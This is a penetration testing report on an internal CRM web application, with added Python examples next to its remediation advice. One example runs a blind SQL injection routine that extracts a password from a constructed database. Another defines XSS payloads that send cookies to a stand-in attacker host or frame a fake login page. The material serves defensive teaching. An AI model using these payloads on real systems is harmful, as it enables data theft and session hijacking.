CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 1
Document Details
Company Quatrro
Document Title Penetration Testing Report
Date 28-03-2012
Classification Confidential
Document Type Report
Table of Contents
Executive Summary ........ 3
Goal ..................... 3
Scope .................... 3
Assessment Findings ...... 4
Details .................. 12
Conclusion ............... 22
Recommendation ........... 22
Executive Summary
We thank you for choosing Appin Software Security Pvt. Ltd. as your Information Security
partner. We appreciate your business and look forward to providing you services in the near
future. The following report presents the results of the security assessment of the web
application listed under Scope, as per your request. In case you have any questions, please
contact your Appin representative or email
Goal
To provide a comprehensive Penetration Testing Report of the Web Application based on the
OWASP Top 10, including but not limited to SQL Injection, CRLF Injection, Directory
Traversal, File Inclusion, Buffer Overflow, Cross Site Scripting (XSS) and Cross Site Request
Forgery, which will help Quatrro improve its security level by addressing the vulnerabilities
found.
Scope
In depth Security Assessment of the following Web Application:
Web Application: http://10.100.4.50/testcrm/
Audit Date: 26th March 2012
Assessment Findings
Ref No. 1 - SQL Injection - Risk Level: High
Vulnerable URLs:
http://10.100.4.50/testcrm/key_view.php?submit1=View&status=0
http://10.100.4.50/testcrm/orderdetail_frame.php?srno=163473
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111111144

Ref No. 2 - Cross Site Scripting - Risk Level: High
Vulnerable URLs:
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111111144
http://10.100.4.50/testcrm/currency_master.php?cid=15
http://10.100.4.50/testcrm/Payment_master.php?pid=11
http://10.100.4.50/testcrm/mail_template.php?mtid=16
http://10.100.4.50/testcrm/subcategory.php?action=edit&catid=1
http://10.100.4.50/testcrm/newproduct.php?srno=558
http://10.100.4.50/testcrm/system.php?action=edit&idsystem=1
http://10.100.4.50/testcrm/component.php?action=edit&idcomponent=1
http://10.100.4.50/testcrm/incident.php?action=edit&idincident=1
http://10.100.4.50/testcrm/module.php?action=edit&idmodule=1
http://10.100.4.50/testcrm/promocode.php?action=edit&id=6
http://10.100.4.50/testcrm/origin_of_cust.php?action=edit&srno=1
http://10.100.4.50/testcrm/sale_medium.php?action=edit&id=1
http://10.100.4.50/testcrm/brand_master.php?action=edit&id=1
http://10.100.4.50/testcrm/disposition_master.php?action=edit&id=1
http://10.100.4.50/testcrm/computer_type.php?action=edit&code=1
http://10.100.4.50/testcrm/operatingsys.php?action=edit&code=2
http://10.100.4.50/testcrm/computer_age.php?action=edit&code=1
http://10.100.4.50/testcrm/internet_con.php?action=edit&code=3
http://10.100.4.50/testcrm/createdfrom.php?action=edit&id=2
http://10.100.4.50/testcrm/subvdnmap_edit.php?account=91011832&vdn=60250
http://10.100.4.50/testcrm/subvdnmap_edit.php?account=91011832
http://10.100.4.50/testcrm/reportschdl.php?action=edit&id=1
http://10.100.4.50/testcrm/matrixmaster.php?eid=3&acc=36321671&plan=200000522&act=1
http://10.100.4.50/testcrm/partnerreportsetting.php?action=edit&id=14
http://10.100.4.50/testcrm/survey_edit.php?surveyid=69C82D9A-0E2E-E011-91D3-001E0BD9CB7C
http://10.100.4.50/testcrm/menu_header.php?action=edit&headerid=1
http://10.100.4.50/testcrm/sub_menu.php?action=edit&idsmenu=1
http://10.100.4.50/testcrm/rolemaster.php?action=edit&iduserrights=1
http://10.100.4.50/testcrm/business_agent.php?id=1
http://10.100.4.50/testcrm/accountdetails.php?account=91011832&action=1&aname=AAA
http://10.100.4.50/testcrm/ibmaster.php?ibid=206
http://10.100.4.50/testcrm/subibmaster.ph?ibid=1
http://10.100.4.50/testcrm/department.php?action=edit&depid=3
http://10.100.4.50/testcrm/employeemaster.php?eid=1

Ref No. 3 - Unencrypted Login Request - Risk Level: Medium
Vulnerable URLs:
http://10.100.4.50/testcrm/login-exec.php

Ref No. 4 - Phishing Through Frames - Risk Level: Medium
Vulnerable URLs:
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111111144
http://10.100.4.50/testcrm/currency_master.php?cid=15
http://10.100.4.50/testcrm/Payment_master.php?pid=11
http://10.100.4.50/testcrm/mail_template.php?mtid=16
http://10.100.4.50/testcrm/subcategory.php?action=edit&catid=1
http://10.100.4.50/testcrm/newproduct.php?srno=558
http://10.100.4.50/testcrm/system.php?action=edit&idsystem=1
http://10.100.4.50/testcrm/component.php?action=edit&idcomponent=1
http://10.100.4.50/testcrm/incident.php?action=edit&idincident=1
http://10.100.4.50/testcrm/module.php?action=edit&idmodule=1
http://10.100.4.50/testcrm/promocode.php?action=edit&id=6
http://10.100.4.50/testcrm/origin_of_cust.php?action=edit&srno=1
http://10.100.4.50/testcrm/sale_medium.php?action=edit&id=1
http://10.100.4.50/testcrm/brand_master.php?action=edit&id=1
http://10.100.4.50/testcrm/disposition_master.php?action=edit&id=1
http://10.100.4.50/testcrm/computer_type.php?action=edit&code=1
http://10.100.4.50/testcrm/operatingsys.php?action=edit&code=2
http://10.100.4.50/testcrm/computer_age.php?action=edit&code=1
http://10.100.4.50/testcrm/internet_con.php?action=edit&code=3
http://10.100.4.50/testcrm/createdfrom.php?action=edit&id=2
http://10.100.4.50/testcrm/subvdnmap_edit.php?account=91011832&vdn=60250
http://10.100.4.50/testcrm/subvdnmap_edit.php?account=91011832
http://10.100.4.50/testcrm/reportschdl.php?action=edit&id=1
http://10.100.4.50/testcrm/matrixmaster.php?eid=3&acc=36321671&plan=200000522&act=1
http://10.100.4.50/testcrm/partnerreportsetting.php?action=edit&id=14
http://10.100.4.50/testcrm/survey_edit.php?surveyid=69C82D9A-0E2E-E011-91D3-001E0BD9CB7C
http://10.100.4.50/testcrm/menu_header.php?action=edit&headerid=1
http://10.100.4.50/testcrm/sub_menu.php?action=edit&idsmenu=1
http://10.100.4.50/testcrm/rolemaster.php?action=edit&iduserrights=1
http://10.100.4.50/testcrm/business_agent.php?id=1
http://10.100.4.50/testcrm/accountdetails.php?account=91011832&action=1&aname=AAA
http://10.100.4.50/testcrm/ibmaster.php?ibid=206
http://10.100.4.50/testcrm/subibmaster.ph?ibid=1
http://10.100.4.50/testcrm/department.php?action=edit&depid=3
http://10.100.4.50/testcrm/employeemaster.php?eid=1

Ref No. 5 - Directory Listing Enabled - Risk Level: Low
Vulnerable URLs:
http://10.100.4.50/testcrm/template
http://10.100.4.50/testcrm/include
http://10.100.4.50/testcrm/images
Details
Application: http://10.100.4.50/testcrm/
Vulnerability: SQL Injection
Risk: High
Potential Security Issue
It is possible to view, modify or delete database entries and tables.
Technical Description
A common way to reduce the risk of SQL injection is to suppress detailed SQL error messages,
which attackers usually use to locate scripts that are susceptible to SQL injection.
Suppressing the error messages does not remove the injection itself, however.
The concept behind blind SQL injection is that, even without receiving direct data from the
database (in the form of an error message or leaked information), it is possible to extract
data from the database one bit at a time, or to modify the query in a malicious way. The
application's behaviour (a result identical to the original, or a result different from the
original) provides a single bit of information about the evaluated, modified query. The
attacker can therefore formulate an SQL Boolean expression whose evaluation (a single bit)
is exposed through the application's behaviour (identical or not identical to the original),
and repeat the process to read arbitrary values out of the database. The affected parameters
are listed under Ref No. 1 in the findings table (status, srno and orderno).
Fix Recommendations
The primary fix is to stop building SQL statements by string concatenation. Use parameterised
queries (prepared statements with bound parameters) for every query that takes a request
value, so the value reaches the database as data and can never be interpreted as SQL syntax,
and cast parameters that must be numeric (status, srno, orderno) to integers before use. Apply
the change to every query in the application, not only to the three URLs listed, since the same
coding pattern is likely to exist elsewhere in the code base.
Input validation is a secondary, defence-in-depth measure. Verifying that user input does not
contain hazardous characters makes it harder for malicious users to cause your application to
execute unintended operations, such as launching arbitrary SQL queries, embedding JavaScript
code to be executed on the client side, or running operating system commands. On its own it is
not sufficient: a numeric parameter can still be manipulated with a payload that contains none
of the characters below (for example, by appending AND 1=2 to the value), and filtering silently
corrupts legitimate data that happens to contain them.
Where input validation is applied, it is advised to reject (or filter out) all the following
characters:
[1] | (pipe sign)
[2] & (ampersand sign)
[3] ; (semicolon sign)
[4] $ (dollar sign)
[5] % (percent sign)
[6] @ (at sign)
[7] ' (single apostrophe)
[8] " (quotation mark)
[9] \' (backslash-escaped apostrophe)
[10] \" (backslash-escaped quotation mark)
[11] <> (triangular parenthesis)
[12] () (parenthesis)
[13] + (plus sign)
[14] CR (Carriage return, ASCII 0x0d)
[15] LF (Line feed, ASCII 0x0a)
[16] , (comma sign)
[17] \ (backslash)
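The following is an added example, not code from the Appin report or from the testcrm application. It shows the boolean-based blind extraction described in the Technical Description against a query built by string concatenation, the parameterised query that closes it, and why the character list above is not a fix on its own. The orders and users tables, their contents, and the srno handling are assumptions modelled on orderdetail_frame.php?srno=163473 from Ref No. 1; SQLite stands in for the real database.

```python
"""Boolean-based blind SQL injection against a concatenated query, beside
the parameterised query that closes it.

Added example, not part of the Appin report or the testcrm application.
The 'orders' and 'users' tables, their contents and the 'srno' handling are
assumptions modelled on orderdetail_frame.php?srno=163473 from Ref No. 1.
"""
import sqlite3

# Constructed sample data standing in for the CRM database.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (srno INTEGER PRIMARY KEY, customer TEXT)")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.executemany("INSERT INTO orders VALUES (?, ?)",
                 [(163473, "ACME Ltd"), (163474, "Globex")])
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
conn.commit()


def order_detail_vulnerable(srno: str) -> list:
    """The flawed pattern: the query-string value is pasted into the SQL."""
    sql = "SELECT customer FROM orders WHERE srno = " + srno
    return conn.execute(sql).fetchall()


def order_detail_fixed(srno: str) -> list:
    """Bound parameter: the value is sent as data and cannot become syntax."""
    sql = "SELECT customer FROM orders WHERE srno = ?"
    return conn.execute(sql, (srno,)).fetchall()


def oracle(handler, condition: str) -> bool:
    """The single bit the report describes: does the page still show order
    163473 once an attacker-chosen condition is ANDed onto the WHERE clause?
    A database error is treated like 'no rows' (errors are suppressed)."""
    try:
        return bool(handler("163473 AND (" + condition + ")"))
    except sqlite3.Error:
        return False


def extract_admin_password(handler, max_len: int = 32) -> str:
    """Read users.password one character at a time, seven bits per character,
    using nothing but the true/false behaviour of the page."""
    secret = ""
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(6, -1, -1):
            mask = 1 << bit
            cond = ("(unicode(substr((SELECT password FROM users "
                    "WHERE username = 'admin'), %d, 1)) & %d) = %d"
                    % (pos, mask, mask))
            if oracle(handler, cond):
                code |= mask
        if code == 0:          # substr() past the end gives '' -> NULL -> false
            break
        secret += chr(code)
    return secret


# The report's recommended fix, reproduced as a filter.
BLACKLIST = set("|&;$%@'\"<>()+,\\\r\n")


def blacklist_filter(value: str) -> str:
    """Drop every character on the report's list."""
    return "".join(ch for ch in value if ch not in BLACKLIST)


def still_injectable_after_filter(handler) -> bool:
    """True when a true and a false condition built only from characters the
    filter allows still produce different pages: the injection survives."""
    true_case = handler(blacklist_filter("163473 AND 1=1"))
    false_case = handler(blacklist_filter("163473 AND 1=2"))
    return true_case != false_case


if __name__ == "__main__":
    print("vulnerable handler leaks:", extract_admin_password(order_detail_vulnerable))
    print("fixed handler leaks:    ", repr(extract_admin_password(order_detail_fixed)))
    print("filter alone, still injectable:",
          still_injectable_after_filter(order_detail_vulnerable))
```

Against the concatenating handler the loop recovers the whole password from yes/no answers alone; against the bound-parameter handler every probe returns no rows, so nothing is recovered. The filter test shows that a numeric parameter is still injectable with characters the list allows, which is why the parameterised query, not the character list, is the fix.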
Application: http://10.100.4.50/testcrm/
Vulnerability: Cross Site Scripting
Risk: High
Potential Security Issue
It is possible to steal or manipulate customer session and cookies, which might be used to
impersonate a legitimate user, allowing the hacker to view or alter user records, and to
perform transactions as that user.
Technical Description
Cross-Site Scripting (XSS) is a privacy violation that allows an attacker to acquire a
legitimate user's credentials or session and to impersonate that user when interacting with a
specific website.
The attack hinges on the fact that the web site contains a script that returns a user's input
(usually a parameter value) in an HTML page without first encoding it. This allows input
consisting of JavaScript code to be executed by the browser when the script returns this input
in the response page. As a result, it is possible to form links to the site in which one of the
parameters consists of malicious JavaScript code. This code is executed by the victim's browser
in the site's own origin, granting it access to the cookies the user has for the site and to
other windows of the site in the user's browser. In this application the affected pages are the
edit and master-data pages listed under Ref No. 2, each of which reflects a query-string
parameter into its response.
Possible actions that can be performed by the script are:
[1] Send the user's cookies (for the legitimate site) to the attacker.
[2] Send information that is accessible through the DOM (URLs, form fields, etc.) to the
attacker.
[3] Submit forms and perform transactions on the site as the logged-in user.
The result is that the security and privacy of the victim user is compromised on the vulnerable
site.
Fix Recommendations
Encode output rather than relying on input filtering alone: at every point where a request
parameter is written into the response, apply the encoding for that context (HTML entity
encoding in element content and attribute values, JavaScript string escaping inside script
blocks, URL encoding inside href and src values) and quote all attribute values. For the HTML
contexts in a PHP application, htmlspecialchars() with ENT_QUOTES is sufficient. In addition,
mark the session cookie HttpOnly so that injected script cannot read it; this limits, but does
not remove, the impact of any remaining XSS.
As a secondary measure, sanitize user input and filter out JavaScript code. We suggest you
filter the following characters:
[1] <> (triangular parenthesis)
[2] " (quotation mark)
[3] ' (single apostrophe)
[4] % (percent sign)
[5] ; (semicolon)
[6] () (parenthesis)
[7] & (ampersand sign)
[8] + (plus sign)
Application: http://10.100.4.50/testcrm/
Vulnerability: Unencrypted Login Request
Risk: Medium
Potential Security Issue
It may be possible to steal user login information such as usernames and passwords that are
sent unencrypted.
Technical Description
During the application test it was detected that the login request to login-exec.php is sent to
the server over plain HTTP. Since some of the fields used in a login process (usernames,
passwords, etc.) are personal and sensitive, they should be sent to the server over an
encrypted connection. Over an unencrypted connection, anyone able to observe traffic between
the browser and 10.100.4.50 can read the credentials.
Fix Recommendations
Make sure that all login requests are sent to the server over TLS (HTTPS). Serve the login
page itself over HTTPS as well, not only the form target, so that an attacker on the network
cannot rewrite the form action; redirect plain HTTP requests for the application to HTTPS; and
set the Secure flag on the session cookie so that it is never sent over HTTP.
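The following is an added example, not code from the report or from testcrm: a check for the condition the scanner flagged, applied to a login page's HTML. It resolves each password form's action against the page URL, so a relative action inherits the page's scheme (a login page served over http:// is flagged even with action="login-exec.php"), and it also catches the case where the page is HTTPS but the form posts back to an http:// URL. The sample page is constructed; the field names are assumptions.

```python
"""Flag password forms that would be submitted over plain HTTP.

Added example, not part of the Appin report or the testcrm application.
The sample login page and its field names are constructed assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormFinder(HTMLParser):
    """Collects {'action': ..., 'password': bool} for every form on the page."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None

    def close(self):
        """Keep a form that was never closed instead of silently dropping it."""
        super().close()
        if self._current is not None:
            self.forms.append(self._current)
            self._current = None


def unencrypted_logins(page_url: str, page_html: str) -> list:
    """Return the absolute submit URLs of password forms that are not HTTPS.

    An empty or relative action resolves against the page URL, exactly as the
    browser would resolve it, so the page's own scheme decides the outcome."""
    finder = FormFinder()
    finder.feed(page_html)
    finder.close()
    flagged = []
    for form in finder.forms:
        if not form["password"]:
            continue
        target = urljoin(page_url, form["action"])
        if urlsplit(target).scheme != "https":
            flagged.append(target)
    return flagged


# Constructed sample page modelled on a login form posting to login-exec.php.
LOGIN_PAGE = """
<html><body>
<form action="login-exec.php" method="post">
  <input type="text" name="login">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>
<form action="search.php" method="get"><input type="text" name="q"></form>
</body></html>
"""

if __name__ == "__main__":
    for url in ("http://10.100.4.50/testcrm/index.php",
                "https://10.100.4.50/testcrm/index.php"):
        print(url, "->", unencrypted_logins(url, LOGIN_PAGE))
```

The search form is ignored because it carries no password field; only forms that would transmit a credential are reported.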
Application: http://10.100.4.50/testcrm/
Vulnerability: Phishing Through Frames
Risk: Medium
Potential Security Issue
It is possible to persuade a naive user to supply sensitive information such as username,
password, credit card number, etc. to an attacker-controlled page shown inside the genuine
application.
Technical Description
It is possible for an attacker to inject a frame or iframe tag with malicious content that
resembles the attacked site. An incautious user may browse it and not realise that he is leaving
the original site and surfing to a malicious site. The attacker may then lure the user to log in
again, thus acquiring his login credentials.
The fact that the fake site is embedded in the original site helps the attacker by giving his
phishing attempt a more credible appearance. The affected URLs are the same as those for Cross
Site Scripting (Ref No. 2): both findings stem from the same missing output encoding, since a
parameter that accepts an injected iframe tag accepts a script tag as well.
Fix Recommendations
The fix is the same as for Cross Site Scripting: encode request parameters for the HTML
context in which they are written, which turns an injected iframe tag into harmless text. Note
that the X-Frame-Options header does not help here, because the frame is injected into the
application's own page rather than the application being framed by another site; a
Content-Security-Policy with a restrictive frame-src directive would stop the injected frame
from loading and is worthwhile as defence in depth.
As a secondary measure it is advised to filter out all the following characters:
[1] | (pipe sign)
[2] & (ampersand sign)
[3] ; (semicolon sign)
[4] $ (dollar sign)
[5] % (percent sign)
[6] @ (at sign)
[7] ' (single apostrophe)
[8] " (quotation mark)
[9] \' (backslash-escaped apostrophe)
[10] \" (backslash-escaped quotation mark)
[11] <> (triangular parenthesis)
[12] () (parenthesis)
[13] + (plus sign)
[14] CR (Carriage return, ASCII 0x0d)
[15] LF (Line feed, ASCII 0x0a)
[16] , (comma sign)
[17] \ (backslash)
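The following is an added example, not code from the report or from testcrm, serving both Ref No. 2 (Cross Site Scripting) and Ref No. 4 (Phishing Through Frames), since they share one cause. It renders a query-string value into an edit form the vulnerable way and the encoded way, parses each response the way a browser would, and reports which elements the attacker's value created. It also shows why output encoding is preferred over the character filter: the encoded form round-trips legitimate data intact, while the filter corrupts it. The form template, the catid parameter and the payloads are assumptions modelled on subcategory.php?action=edit&catid=1.

```python
"""Reflected XSS and phishing-through-frames from one unencoded parameter,
beside the output-encoded version of the same page.

Added example, not part of the Appin report or the testcrm application.
The form template, the 'catid' parameter and the payloads are constructed
assumptions modelled on subcategory.php?action=edit&catid=1.
"""
import html
from html.parser import HTMLParser


def render_vulnerable(catid: str) -> str:
    """String concatenation: whatever is in catid becomes part of the markup."""
    return ('<form action="subcategory.php" method="post">'
            '<input type="text" name="catid" value="' + catid + '">'
            '<input type="submit" value="Save"></form>')


def render_fixed(catid: str) -> str:
    """Encode for the HTML attribute context.  quote=True also turns " and '
    into entities, so the value can never close the attribute it sits in."""
    safe = html.escape(catid, quote=True)
    return ('<form action="subcategory.php" method="post">'
            '<input type="text" name="catid" value="' + safe + '">'
            '<input type="submit" value="Save"></form>')


# The report's suggested XSS fix, reproduced as a filter.
XSS_BLACKLIST = set("<>\"'%;()&+")


def blacklist_filter(value: str) -> str:
    """Strip every character on the report's list."""
    return "".join(ch for ch in value if ch not in XSS_BLACKLIST)


class ElementCollector(HTMLParser):
    """Records (tag, attributes) for every element the browser would create.
    HTMLParser decodes entities in attribute values, as a browser does."""

    def __init__(self):
        super().__init__()
        self.elements = []

    def handle_starttag(self, tag, attrs):
        self.elements.append((tag, dict(attrs)))


def parse(page: str) -> list:
    collector = ElementCollector()
    collector.feed(page)
    collector.close()
    return collector.elements


def injected_elements(page: str) -> list:
    """Elements in the response that the template itself never emits."""
    return [tag for tag, _ in parse(page) if tag not in ("form", "input")]


def catid_as_seen_by_browser(page: str):
    """The decoded value of the catid field, or None if it was lost."""
    for tag, attrs in parse(page):
        if tag == "input" and attrs.get("name") == "catid":
            return attrs.get("value")
    return None


# Constructed payloads.  The first ships the session cookie to the attacker
# (Ref No. 2); the second embeds an attacker-controlled login page inside the
# genuine site (Ref No. 4).  attacker.example is a placeholder host.
COOKIE_THEFT = ('1"><script>new Image().src='
                '"http://attacker.example/?c="+document.cookie</script>')
FRAME_PHISH = ('1"><iframe src="http://attacker.example/testcrm/login.php" '
               'width="100%" height="600"></iframe>')
LEGIT_VALUE = "O'Brien & Sons (50% off)"

if __name__ == "__main__":
    for payload in (COOKIE_THEFT, FRAME_PHISH):
        print("vulnerable:", injected_elements(render_vulnerable(payload)),
              " fixed:", injected_elements(render_fixed(payload)))
    print("encoded round-trip:", catid_as_seen_by_browser(render_fixed(LEGIT_VALUE)))
    print("after filter:      ",
          catid_as_seen_by_browser(render_vulnerable(blacklist_filter(LEGIT_VALUE))))
```

With concatenation the two payloads create a script element and an iframe element respectively; with encoding neither payload creates anything, and the browser simply sees the payload text as the field's value. The legitimate value survives encoding unchanged, whereas the filter hands the user "OBrien  Sons 50 off".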
Application: http://10.100.4.50/testcrm/
Vulnerability: Directory Listing Enabled
Risk: Low
Potential Security Issue
It is possible to view and download the contents of certain web application directories
(template, include and images), which might contain restricted files.
Technical Description
If the web server is configured to generate automatic indexes, it is possible to retrieve a
directory listing by sending a request for a directory rather than for a file. The listing
reveals file names an attacker would otherwise have to guess, such as backup copies, old
versions of scripts, or include files holding configuration and database credentials.
Fix Recommendations
[1] Configure the web server to deny listing of directories. In Apache, remove Indexes from
the Options directive for the document root (Options -Indexes in the virtual host or in
.htaccess); in nginx, set autoindex off. Place an index file in any directory that must remain
reachable.
[2] If the listing is caused by a defect in the web server or web application software rather
than by configuration, apply the vendor's security patch for that issue.
[3] Review the contents of the three directories for files that should not be web-accessible
and move them outside the document root; include files in particular should not be requestable
directly.
Conclusion
On the basis of the penetration testing carried out on your web application, it can be
concluded that the application contains exploitable vulnerabilities: SQL injection (High),
cross-site scripting across most of the edit and master-data pages (High), an unencrypted login
request (Medium), phishing through frames (Medium) and directory listing (Low).
Recommendation
High and Medium level vulnerabilities should be fixed on priority. Because the SQL injection
and cross-site scripting findings affect many pages, the fixes should be applied at the
data-access and output-encoding layers across the code base rather than page by page, and
the application should be re-tested once remediation is complete.